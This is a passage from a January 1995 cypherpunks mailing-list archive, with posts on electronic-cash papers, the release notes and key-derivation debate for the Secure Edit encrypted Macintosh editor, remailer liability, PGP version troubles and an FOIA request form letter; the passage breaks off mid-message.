Fidelity's new WWW server (shhh! don't tell!) and it turns out he was the
guy who actually *had* bob.com. A third party approached him and asked him
if he wanted to sell the domain name. He did. He picked another domain
name, and last week someone called him if he wanted to sell his *new*
domain name. He said no, and they asked him if he would *rent* it to
them...

Go figure.

Cheers,
Bob Hettinga

Eric, what'll you take for "remailer.net"? ;-).


-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:30:13 PST
To: cypherpunks@toad.com
Subject: Available: Cash paper by anonymous FTP
Message-ID: <v01510105ab3b652526f9@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>From: brands@cwi.nl
>Original-From: Stefan.Brands@cwi.nl
>Subject: Available: Cash paper by anonymous FTP
>To: www-buyinfo@allegra.att.com
>Date: Thu, 12 Jan 1995 18:57:39 +0100 (MET)
>Mime-Version: 1.0
>Status: U
>
>
> I have made available for ftp-retrieval my paper
>
>       "Off-Line Electronic Cash Based on Secret-Key certificates."
>
> This paper will be presented at the Second International Symposium of
> Latin American Theoretical Informatics (LATIN '95), April 3-7, 1995.
>
> If you are interested in downloading a copy, login by anonymous ftp at
>
>                          ftp.cwi.nl
>
> The paper is in the directory pub/brands, under the name
> "latin95.<ext>." The extension <ext> refers to dvi and PostScript
> formats.
>
> Greetings
>
> Stefan Brands,
> ------------------------------------------------------
> CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands
> Tel: +31 20 5924103, e-mail: brands@cwi.nl
>
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:31:19 PST
To: cypherpunks@toad.com
Subject: Paper on NetCheque and requirements of network payment services
Message-ID: <v01510101ab3b6bb5b201@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>From: bcn@ISI.EDU
>Date: Thu, 12 Jan 1995 11:11:49 -0800
>Posted-Date: Thu, 12 Jan 1995 11:11:49 -0800
>Original-From: Clifford Neuman <bcn@ISI.EDU>
>To: www-buyinfo@allegra.att.com
>Subject: Paper on NetCheque and requirements of network payment services
>Status: U
>
>There is a new paper available on NetCheque(TM) and requirement of
>network payment services.  The paper will be presented at IEEE Compcon
>in March.  The paper can be retrieved from prospero.isi.edu in
>
>/pub/netcheque/information/netcheque-requirements-compcon95.ps.Z.
>
>Clifford Neuman

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Thu, 12 Jan 95 17:33:12 PST
To: cypherpunks@toad.com
Subject: Re: RELEASE: Secure Edit beta 0.5
Message-ID: <v02110101ab3b85b46606@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:18 PM 1/12/95, Tom Bryce wrote:
>[. . .]
>* the salt is concatenated with MD5[passphrase] many times and this
>concatenated string hashed to generate the 'session key' for the file
>from your pass phrase. The number of times it is concatenated is
>calibrated to make it take about half a second - not a big performance
>loss, but it makes brute force attack of weak passphrases up to
>thousands of times more costly.
>[. . . .]

This is only going to work if MD5 is not a "group"--that is, if there is no
simple algorithm which is equivialent to md5(md5(x)). I doubt that's been
proven.

Rather, you'd be better off using DES in any of the ways that Schneir
describes (page 338 and following) and reiterate that many times.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Thu, 12 Jan 95 10:52:56 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
Message-ID: <Pine.3.89.9501121847.A13935-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Jan 1995, Russell Nelson wrote:

> I really *don't* think that New York State plans to
> ban encryption, not now and not over this issue anyway.  His thrust is
> 1) to have the legal authority to sufficiently punish someone who goes
> after children (which they don't have now), and 2) to educate guardians
> about the risks of untoward communications from adults to children.

But what happens if, say, a minor is solicited for sex when they are
pretending to be older than they are ? Or if the solicitation comes via a
remailer ?  Or a minor with a grudge fakes email to show that someone 
attempted to get them to agree to sex/picture-taking or whatever ?

Once you pass laws making some forms of communication illegal, you're 
immediately getting into dodgy territory requiring is-a-person 
credentials and so on. That isn't neccesarily a problem if it's voluntary 
(e.g. your kids accounts might be set up to only accept mail from people 
who're certified to be under 18 or whatever), but governments are 
unlikely to do things that way.

		Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 16:11:42 PST
To: cypherpunks@toad.com
Subject: RELEASE: Secure Edit beta 0.5
Message-ID: <v01510103ab3b73cfd8be@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----


               RELEASE: secure edit beta 0.5 for Macintosh

Miyako Software has released an improved version of secure edit. It is
now available for FTP from ripem.msu.edu in the directory pub/crypt/mac,
and at other ITAR-compliant sites. Finger tjbryce@amherst.edu for an
updated site list, as well as information on other products by miyako
software. All releases are signed with the Miyako Software public PGP
key.

Version b0.5 sports the following new features:

FOR EASE OF USE AND UTILITY:
* extensive balloon help
* an undo command
* print command
* a find command (useful for storing sensitive information with secure
edit)
* windows menu with tile and stack commands
* copy with line breaks inserted, for composing email or pgp messages
* much better and faster compression and a smaller base file size
* secure edit now uses Colin Plumb's fast 68k assembly IDEA
implementation
* you can turn off the annoying  marks
* the menu blinking clunky has been fixed
* the window update annoyance has been fixed
* various interface clunkies have been fixed
* new and more intuitive icons have been drawn

FOR SECURITY:
* much better random number management using the code written by Colin
Plumb for PGP
* random data is snarfed from all events the application observes
(such as your keystrokes), the time these events occur, and by
continuously tracking your mouse position, even when backgrounded. the
pool of random data is maintained between sessions and is encrypted
based on these random events before it is written to disk and before
use.
* so that every file is encrypted on a different IDEA key, making
cryptanalysis of one useless agaist others, your key is salted with 128
bits of random data, stored in the clear for decryption, to make a
'session key'. thus, the key used to encrypt every file will be
different, even if you used the same passphrase. this makes
cryptanalysis of one file useless against others.
* the salt is concatenated with MD5[passphrase] many times and this
concatenated string hashed to generate the 'session key' for the file
from your pass phrase. The number of times it is concatenated is
calibrated to make it take about half a second - not a big performance
loss, but it makes brute force attack of weak passphrases up to
thousands of times more costly.
* semi-splay compression is utilized, which is faster than the lame
old compression (written by me :( ) and which gets >50% file reduction.
It strengthens the encryption by reducing the redundancy in the
plaintext. It also continually modifies the compression encoding system
based on the data as it goes along, making the interpretation of
compressed data dependent on the data that has come before it
* you can verify keys against Curve Encrypt keyfiles
* documents that are saved in plaintext format clearly distinguished
by "TEXT:" in the window title
* the source code has been cleaned up :-) and much improved to make it
easier to verify yourself that the program is strong and secure.

                           ------THE BASICS------
                           (from version a 0.3.4)

SECURE EDIT is an editor designed for editing sensitive text buffers.
It is designed to prevent plaintext from ever being written to disk,
even if only momentarily. You might fail to overwrite or encrypt such
plaintext properly, or your opponent might be able to retrieve some of
the information even though you wiped it (see docs for details). Word
Processors generally create temp and scratch files that leave plaintext
on your drive whether you like it or not. Secure edit fixes this
problem. Sometimes you need to quit in a hurry and have all your data
encrypted and saved. Or you might prefer to have your files encrypted at
all times so that you never forget to re-encrypt a file you worked on,
and so that files are never in plaintext form while you are working with
them. Secure edit sports the following features to serve these and other
data security needs:

* Plaintext is never written to disk - Secure Edit locks all sensitive
buffers in memory so that virtual memory will never swap them to disk.
This includes the text you are editing as well as any encryption keys in
use.

* Secure Edit never creates plaintext temp or scratch files

* Secure Edit offers the option of saving files directly in encrypted
format so you never have plaintext on the hard drive.

* Your data is compressed and encrypted in RAM with the IDEA
algorithm, then written to disk in encrypted format.

* Secure Edit can mantain a secure, private clipboard, interconverting
with the system clipboard only when you use OPTION-cut,copy, and paste.
This prevents the system from getting a copy of your sensitive data and
possibly writing it to disk, or leaving it around for another user to
see.

* Secure Edit can open foreign text files, and DOD wipe them on
request when you save the file in encrypted format.

* Secure Edit offers a default passphrase option so you only need to
enter your passphrase once. It also offers the option of validating your
phrase against secure validation information that can be used to check
that you have entered your standard pass phrase, but which cannot be
used to recover the passphrase. This prevents you from saving under a
bad passphrase and losing data.

* Secure Edit offers a time-out option, whereby it will save all files
and quit after a certain idle time period

* Secure Edit offers an option-quit feature, whereby it will assume it
is okay to save all files, and save and quit as quickly as possible

* Secure Edit is available to U.S. citizens in the U.S. at an
ITAR-compliant site near you. I'm presently uploading it to
ripem.msu.edu and others.

* source code is, of course, available.

* Questions about Secure Edit should be directed to me, at
<tjb@acpub.duke.edu>

Thanks for your attention.

Tom Bryce

/////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*---------------------------------------------------------*
Miyako Software is dedicated to creating freeware to help
make computers tools of personal liberation and expression.
for product info and PGP key, finger <tjbryce@amherst.edu>
                email: <tjb@acpub.duke.edu>
*---------------------------------------------------------*
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_/////////////////////////////

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxN4F08YjrUhOUC5AQGueAQAkJNvwUO5QVZd9FQnfwm2HnKiFH/DvAUQ
2TWkrqhRJ2R06Ht98Vrw/ixacQLP9GEobKlK1WDdQE/lNZGre2IgLS0lXm39F1ll
A0wSIpRrJ5wK2KlWEbq1e5cuaooA/+Y2C6U7RAQbj+/wF9/9FqKvzmLAzYgx2pqD
VxDCzkn2A4s=
=d0DX
-----END PGP SIGNATURE-----


------------------------------------------------------------------------
             /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\
            |               Tom Bryce                  |____|
  ___       |               Duke  Med                  |         ___
{~._.~}     |           tjb@acpub.duke.edu             |       {~._.~)
 ( Y )      |   PGP keys: finger tjbryce@amherst.edu   |        ( Y )
()~*~()     |personal:9B6088464ED86413 0F5E55E45CF1C961|       ()~*~()
(_)-(_)     |miyako                                    |       (_)-(_)
            |software:02646F0B06DCFE03 E6DD367DB4E1010F|
         /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/   |
         \_________________________________________\__/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Thu, 12 Jan 95 17:46:19 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501130137.AA03281@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:
> ... Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.

Perhaps I missed this, but why?  If someone is going to plant kiddie porn or 
whatever on you, does it really matter if they encrypt it first or not?

If the purpose is simply to generate additional encrypted traffic to obscure 
stuff that needs encryption, that goal might be better served by simply 
encrypting files for their recipient as they pass through, in those cases 
where a public key is available and the msg isn't already encrypted.

I forget the name of the cypher (Vigere, perhaps--the one that uses a series 
of Caesar-like cyphers keyed by a password), but you could just run it 
through that with a password of abcdefghijklmnopqrstuvwxyz and you'd flatten 
out the distribution enough to get it by casual inspection.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Thu, 12 Jan 95 13:12:58 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
In-Reply-To: <9501122019.AA14798@pilot.njin.net>
Message-ID: <Pine.3.89.9501122157.A13935-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Jan 1995, Frederic Halper wrote:

> Any person no matter their age should be wary if someone solicits them 
> for sex.

I agree, however it does seem to be a bit much for a horny geek who
propositions a supposed 21-year old who turns out to be 14 to be sent to
jail and forever marked as an EVIL PEDOPHILE, rather than just being told
to get a life. Particularly if, say, the girl in question was posting to
alt.sex.wanted or something.

But the main point I was trying to make here is that with laws like this
proof of age would be required in both directions. Of course, a system
that stamped each users age on outgoing messages could well lead to more
real-world abuse by the real crazies, not less... 

			Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Thu, 12 Jan 95 19:49:37 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501130137.AA03281@eri.erinet.com>
Message-ID: <N3V5lG9s1WC8075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501130137.AA03281@eri.erinet.com>,
pstemari@erinet.com (Paul J. Ste. Marie) wrote:
> At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:
> > ... Seems to me that a quite reasonable condition of use of a remailer is
> >that what is passed isn't human readable.
> 
> Perhaps I missed this, but why?  If someone is going to plant kiddie porn or 
> whatever on you, does it really matter if they encrypt it first or not?
> 

The goal is to convince the two groups of concerned parties that the
remailer operators don't know the contents of what's passing through
their remailers:

         (1) the people who use the remailer, who get a measure of 
             comfort from knowing their communication is secure

         (2) legal groups etc. who may try to hold the remailer 
             liable in some way for what passes through their remailer.

A large percentage of material that passes through remailers might
be offensive to SOMEONE---if even just because an unpopular opinion
is expressed.  

The remailers are operated by people who want to promote information
flow, not restrict it.  They provide an important service that is of
critical importance to some people and groups who use the net.  They
shouldn't be held accountable for the few who abuse the remailers,
and encryption helps prevent that from happening.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Thu, 12 Jan 95 19:21:32 PST
To: cypherpunks@toad.com
Subject: Keyboard sniffer source code
Message-ID: <0098A5EA.FA888140.1@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Not to be paranoid, but did anybody receive that program?

Does cypherpunkcs@toad.com have a pgp key?

I think it was intercepted.

mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Draper <crunch@well.sf.ca.us>
Date: Thu, 12 Jan 95 21:51:26 PST
To: cypherpunks@toad.com
Subject: Some PGP problems
Message-ID: <199501130551.VAA01278@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I'm trying to decode a PGP file that was created with Ver 2.6.
At this time,  I thought that my older ver 2.1c (Running on a
Mac) would at least be able to decrypt something made from
a higher version,  running on a PC.   Apparently that is not so.

So,  the next thing I did,   or what any self respecting
Cypherpunk might so,   is to go out on the net and look
for a later version to FTP>   Well,   after discovering
that soda.berkeley.edu don't exist anymore,  I eventually
found the ftp site where it lives.  ftp.csua.berkeley.edu.

I learn that Mac PGP2.3 exists,  but NO version 2.6
exists for the Mac.   Is that true?    If not,  then
where can I get a copy,  so I can decode a message
created with 2.6?    If ver 2.3 will decode a message
encoded with 2.6,  then I'm faced with how I can
extract this Mac file which has a .gz extension.
Binhex don't seem to decode it.  So,  I now got this
file named "macpgp2.3.cpt.hqx.gz" on my Mac.    Was
I supposed to have used some special UNIX itility to
convert the .gz thingie first?    Please emlighten
this confused cypherpunker!!! :-)   Or will I even have
to do all of this because 2.3 is incompatable with 2.6.

C. Crunch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 12 Jan 95 22:02:15 PST
To: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Subject: Re: Purpose of Data Havens
In-Reply-To: <199501121810.NAA25089@bb.hks.net>
Message-ID: <Pine.3.89.9501122152.A28265-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, L. McCarthy wrote:

> Scenario: June is a test engineer at Rockwell Intl. At the lab where she works,
> it is observed that some rubber O-rings being designed for the space shuttle
> are liable to crack, and lose their airtight seal, when exposed to the 
> extremely low temperatures of space. The project is behind, so the researchers
> are instructed to proceed in spite of the problem. June encrypts the test
> results and deposits them in a data haven.

Digression:  

The interesting thing is that NASA was damn near able
to keep this matter secret despite the projects chief engineer kicking
and screaming.

When Feynman wandered in to Morton Thiokol and started asking questions 
he was not met with a cover up -- instead he was told the whole story,
complete with the chart that lead the chief booster engineer, with
the support of the entire engineering team, to send email and
written reports that the Challenger would blow up unless the launch
was delayed.

And despite one of the worlds most famous scientists knowing the
truth, and despite the fact that he was the only scientist on
the commission of enquiry, they still might well have kept it quiet
if Feynman had not ambushed them on TV.

And despite Feynmans ambush, they still managed pretty good
damage control.

Of course today such a cover up would never succeed -- someone
would just mail it to the internet, and the story would blow.

But the fact is the cover up largely succeeded despite the efforts
of the Chief engineer (which got him blacklisted) and despite
the theatric efforts of one of the worlds most eminent
scientists, perhaps the most eminent living scientist of 
that time.

It makes me realize that the world has already changed, vastly
for the better, and those in power do not yet realize it.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Thu, 12 Jan 95 19:21:04 PST
To: cypherpunks@toad.com
Subject: How "good" is MDC?
Message-ID: <9501130321.AA03497@toad.com>
MIME-Version: 1.0
Content-Type: text


I've been toying with a homegrown implementation of the MDC algorithm,
similar to the one used in HPack, written mostly in 386 assembler though.
My version also scrambles the constants by multiple cycles over the key,
so it should be better the vanilla MD5... I'm wondering how "secure" MDC
is, though... are there better hashing algorithms or possible modifications
that could be made?

(A silly question considering I haven't yet released the sources.  When
they are ready I'll post an announcement or something.)

  Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 19:25:28 PST
To: cypherpunks@toad.com
Subject: Re: RELEASE: Secure Edit beta 0.5
Message-ID: <v01510102ab3ba3ffa431@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


Ben Goren wrote:

>At 5:18 PM 1/12/95, Tom Bryce wrote:
>>[. . .]
>>* the salt is concatenated with MD5[passphrase] many times and this
>>concatenated string hashed to generate the 'session key' for the file
>>from your pass phrase. The number of times it is concatenated is
>>calibrated to make it take about half a second - not a big performance
>>loss, but it makes brute force attack of weak passphrases up to
>>thousands of times more costly.
>>[. . . .]
>
>This is only going to work if MD5 is not a "group"--that is, if there is no
>simple algorithm which is equivialent to md5(md5(x)). I doubt that's been
>proven.

This is not exactly what secure edit does. It hashes in the following
manner to generate a session key:

MD5 [ (128-bit salt) MD5[passphrase] 0 MD5[passphrase] 1 MD5[passphrase] 2 ... ]
to get the session key. The 0, 1, 2 is a single byte. So there is only one
level of nesting of the hashes. This is actually a common and well-regarded
technique for increasing the security of weak passphrases.

Tom



------------------------------------------------------------------------
             /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\
            |               Tom Bryce                  |____|
  ___       |               Duke  Med                  |         ___
{~._.~}     |           tjb@acpub.duke.edu             |       {~._.~)
 ( Y )      |   PGP keys: finger tjbryce@amherst.edu   |        ( Y )
()~*~()     |personal:9B6088464ED86413 0F5E55E45CF1C961|       ()~*~()
(_)-(_)     |miyako                                    |       (_)-(_)
            |software:02646F0B06DCFE03 E6DD367DB4E1010F|
         /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/   |
         \_________________________________________\__/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 19:33:07 PST
To: cypherpunks@toad.com
Subject: RELEASE: secure edit, resend (was bad pgp signature)
Message-ID: <v01510104ab3ba6452cd2@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


It's been brought to my attention that I messed up and the pgp signature
did not validate my post about secure edit.

I'm not sure where exactly I messed up, but here goes again... sorry for
sending it twice. :(


-----BEGIN PGP SIGNED MESSAGE-----



               RELEASE: secure edit beta 0.5 for Macintosh

Miyako Software has released an improved version of secure edit. It is
now available for FTP from ripem.msu.edu in the directory
pub/crypt/mac,
and at other ITAR-compliant sites. Finger tjbryce@amherst.edu for an
updated site list, as well as information on other products by miyako
software. All releases are signed with the Miyako Software public PGP
key.

Version b0.5 sports the following new features:

FOR EASE OF USE AND UTILITY:
* extensive balloon help
* an undo command
* print command
* a find command (useful for storing sensitive information with secure
edit)
* windows menu with tile and stack commands
* copy with line breaks inserted, for composing email or pgp messages
* much better and faster compression and a smaller base file size
* secure edit now uses Colin Plumb's fast 68k assembly IDEA
implementation
* you can turn off the annoying  marks
* the menu blinking clunky has been fixed
* the window update annoyance has been fixed
* various interface clunkies have been fixed
* new and more intuitive icons have been drawn

FOR SECURITY:
* much better random number management using the code written by Colin
Plumb for PGP
* random data is snarfed from all events the application observes
(such as your keystrokes), the time these events occur, and by
continuously tracking your mouse position, even when backgrounded. the
pool of random data is maintained between sessions and is encrypted
based on these random events before it is written to disk and before
use.
* so that every file is encrypted on a different IDEA key, making
cryptanalysis of one useless agaist others, your key is salted with 128
bits of random data, stored in the clear for decryption, to make a
'session key'. thus, the key used to encrypt every file will be
different, even if you used the same passphrase. this makes
cryptanalysis of one file useless against others.
* the salt is concatenated with MD5[passphrase] many times and this
concatenated string hashed to generate the 'session key' for the file
from your pass phrase. The number of times it is concatenated is
calibrated to make it take about half a second - not a big performance
loss, but it makes brute force attack of weak passphrases up to
thousands of times more costly.
* semi-splay compression is utilized, which is faster than the lame
old compression (written by me :( ) and which gets >50% file reduction.
It strengthens the encryption by reducing the redundancy in the
plaintext. It also continually modifies the compression encoding system
based on the data as it goes along, making the interpretation of
compressed data dependent on the data that has come before it
* you can verify keys against Curve Encrypt keyfiles
* documents that are saved in plaintext format clearly distinguished
by "TEXT:" in the window title
* the source code has been cleaned up :-) and much improved to make it
easier to verify yourself that the program is strong and secure.

                           ------THE BASICS------
                           (from version a 0.3.4)

SECURE EDIT is an editor designed for editing sensitive text buffers.
It is designed to prevent plaintext from ever being written to disk,
even if only momentarily. You might fail to overwrite or encrypt such
plaintext properly, or your opponent might be able to retrieve some of
the information even though you wiped it (see docs for details). Word
Processors generally create temp and scratch files that leave plaintext
on your drive whether you like it or not. Secure edit fixes this
problem. Sometimes you need to quit in a hurry and have all your data
encrypted and saved. Or you might prefer to have your files encrypted
at
all times so that you never forget to re-encrypt a file you worked on,
and so that files are never in plaintext form while you are working
with
them. Secure edit sports the following features to serve these and
other
data security needs:

* Plaintext is never written to disk - Secure Edit locks all sensitive
buffers in memory so that virtual memory will never swap them to disk.
This includes the text you are editing as well as any encryption keys
in
use.

* Secure Edit never creates plaintext temp or scratch files

* Secure Edit offers the option of saving files directly in encrypted
format so you never have plaintext on the hard drive.

* Your data is compressed and encrypted in RAM with the IDEA
algorithm, then written to disk in encrypted format.

* Secure Edit can mantain a secure, private clipboard, interconverting
with the system clipboard only when you use OPTION-cut,copy, and paste.
This prevents the system from getting a copy of your sensitive data and
possibly writing it to disk, or leaving it around for another user to
see.

* Secure Edit can open foreign text files, and DOD wipe them on
request when you save the file in encrypted format.

* Secure Edit offers a default passphrase option so you only need to
enter your passphrase once. It also offers the option of validating
your
phrase against secure validation information that can be used to check
that you have entered your standard pass phrase, but which cannot be
used to recover the passphrase. This prevents you from saving under a
bad passphrase and losing data.

* Secure Edit offers a time-out option, whereby it will save all files
and quit after a certain idle time period

* Secure Edit offers an option-quit feature, whereby it will assume it
is okay to save all files, and save and quit as quickly as possible

* Secure Edit is available to U.S. citizens in the U.S. at an
ITAR-compliant site near you. I'm presently uploading it to
ripem.msu.edu and others.

* source code is, of course, available.

* Questions about Secure Edit should be directed to me, at
<tjb@acpub.duke.edu>

Thanks for your attention.

Tom Bryce

/////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*---------------------------------------------------------*
Miyako Software is dedicated to creating freeware to help
make computers tools of personal liberation and expression.
for product info and PGP key, finger <tjbryce@amherst.edu>
                email: <tjb@acpub.duke.edu>
*---------------------------------------------------------*
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_/////////////////////////////


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxX0v08YjrUhOUC5AQE/UwP/eLKniLvJhYm1b1RZf0/0qY3mBUfhIMeT
R/ozIURiOD/qnfmn6Un9BAVvEBiVxivj8z6J2ByOREGO1ZYgpO1kZcEu0tZoP0eo
4fGeg652BYRqk4+Ltw3XcV1nDfudukAOoT9waiub1JsPeNDP/DuM+yt05gPNplNV
UMToRWfMgaM=
=T/QC
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Thu, 12 Jan 95 21:19:50 PST
To: Syed Yusuf <yusuf921@uidaho.edu>
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950112170758.18085D-100000@goshawk.csrv.uidaho.edu>
Message-ID: <HeW5lKjqRyHD077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 12 Jan 1995 17:09:33 -0800 (PST), Syed Yusuf <yusuf921@uidaho.edu> wrote:
>
>
> On Wed, 11 Jan 1995, Samuel Kaplin wrote:
>
> > I hope they took you someplace nice for lunch...You might want to file a
> > FOI request on yourself, just to see how much they censor. ;) They might
> > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)
> >
>
> For the benifit of myself and the list, how would you go about doing that?

Fill out this form letter, get it notarized and send it to the address in
the letterhead. Be prepared to wait and get jerked around. I have heard
that some FOI requests have taken as long as two years to get back.

Sam


                   PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST

(date)


                        (requester's name and address)



        Federal Bureau of Investigation
        Records Management Division -
        FOIA/PA Office
        9th & Pennsylvania Avenue NW
        Washington, DC 20535

Gentlemen:

This is a request for records under the provisions of both the Privacy
Act (5 USC 552b) and the Freedom of Information Act (5 USC 522). This
request is being made under both Acts.

I hereby request one copy of any and all records about me or
referencing me maintained at the FBI. This includes (but should not be
limited to) documents, reports, memoranda, letters, electronic files,
database references, "do not file" files, photographs, audio tapes,
videotapes, electronic or photographic surveillance, "june mail", mail
covers, and other miscellaneous files, and index citations relating to
me or referencing me in other files.

My full name is:___________________________________
My date of birth was______________
My place of birth was:______________________________
My social security #:______________
I have lived in these places:



Other names, places, events, organizations or other references under
which you may find applicable records:



As you know, FOIA/PA regulations provide that even if some requested
material is properly exempt from mandatory disclosure, all segregable
portions must be released. If the requested material is released with
deletions, I ask that each deletion be marked to indicate the
exemption(s) being claimed to authorize each particular withholding.
In addition, I ask that your agency exercise its discretion to release
any records which may be technically exempt, but where withholding
serves no important public interest.

I hereby agree to pay reasonable costs associated with this request up
to a maximum of $25 without my additional approval. However, I
strongly request a fee waiver because this is, in part, a Privacy Act
request.

This letter and my signature have been certified by a notary public as
marked below.

Sincerely,




  _____________________________________________
          requester's signature




  _____________________________________________
          requester's printed name




  _____________________________________________
          notary stamp and signature



- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
       Ambition is a poor excuse for not having sense enough to be lazy.
                            -- Charlie McCarthy --

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxYL5clnXxBRSgfNAQG7Hwf+KMyddMOOrwF1y87eAZzQ49yToEewy3BD
leOTr8vIqOnwPYAGINmH06dUkK8bsMzO9yQKgPnXtr5azjQ1DdGeK/BK23xJx2qm
98rSz68izH2Xi9j0Lcnskafie9oD758D516pl0K14hFNgh9RtrI804QtC7m4lUGK
OfwveyOs6j8O4OwIQQSFb8wStK8WVseaTe1EZrwJjaGcFUOgBNQ6GSe8tLeaBg4+
z6Ruh9oTnzHPSqW4qlnq5wxj/r5dctoQbJkaBut/trj95fgTnrsgOvwlDGCRGCAz
9vcz0jeIaanS8apJ8BUtxkUkQOOFFsKPIvb1viCXTE3qfzwQuYab6Q==
=HjoK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@callisto.acpub.duke.edu (tjb)
Date: Thu, 12 Jan 95 20:56:57 PST
To: cypherpunks@toad.com
Subject: RELEASE: Secure Edit beta 0.5 (again!)
Message-ID: <199501130455.XAA28049@mail.duke.edu>
MIME-Version: 1.0
Content-Type: text/plain



I again apologize for sending this a THIRD time, but we all agree it's
important for PGP signatures to verify properly or people will get
sloppy about verifying them and expecting them to be valid. I strongly
suspect Eudora is doing some formatting of the email when I send it
with Eudora, so I'm sending this post through internews instead. This
really should work - I always paste it first in here, then check the
signature on the clipboard with macpgp. It checks out fine, but when I
